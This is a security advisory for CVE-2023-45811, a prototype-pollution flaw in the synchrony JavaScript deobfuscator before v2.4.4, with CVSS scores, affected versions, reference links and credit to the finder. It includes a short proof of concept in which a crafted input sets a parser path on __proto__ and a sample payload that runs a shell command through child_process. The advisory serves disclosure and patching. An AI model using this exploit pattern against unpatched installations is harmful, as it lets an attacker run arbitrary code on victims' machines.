CVSS3
Attack Vector
LOCAL
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
9.8%
A __proto__
pollution vulnerability exists in synchrony versions before v2.4.4. Successful exploitation could lead to arbitrary code execution.
A __proto__
pollution vulnerability exists in the LiteralMap transformer allowing crafted input to modify properties in the Object prototype.
When executing in Node.js, due to use of the prettier
module, defining a parser
property on __proto__
with a path to a JS module on disk causes a require
of the value which can lead to arbitrary code execution.
A fix has been released in [email protected]
.
Craft a malicious input file named poc.js
as follows:
// Malicious code to be run after this file is imported. Logs the result of shell command "dir" to the console.
console.log(require('child_process').execSync('dir').toString())
// Synchrony exploit PoC
{
var __proto__ = { parser: 'poc.js' }
}
Then, run synchrony poc.js
from the same directory as the malicious file.
This vulnerability was found and disclosed by William Khem-Marquez.
Vendor | Product | Version | CPE |
---|---|---|---|
* | deobfuscator | * | cpe:2.3:a:*:deobfuscator:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-jg82-xh3w-rhxx
github.com/relative/synchrony/commit/b583126be94c4db7c5a478f1c5204bfb4162cf40
github.com/relative/synchrony/security/advisories/GHSA-jg82-xh3w-rhxx
github.com/relative/synchrony/security/advisories/src/transformers/literalmap.ts
nvd.nist.gov/vuln/detail/CVE-2023-45811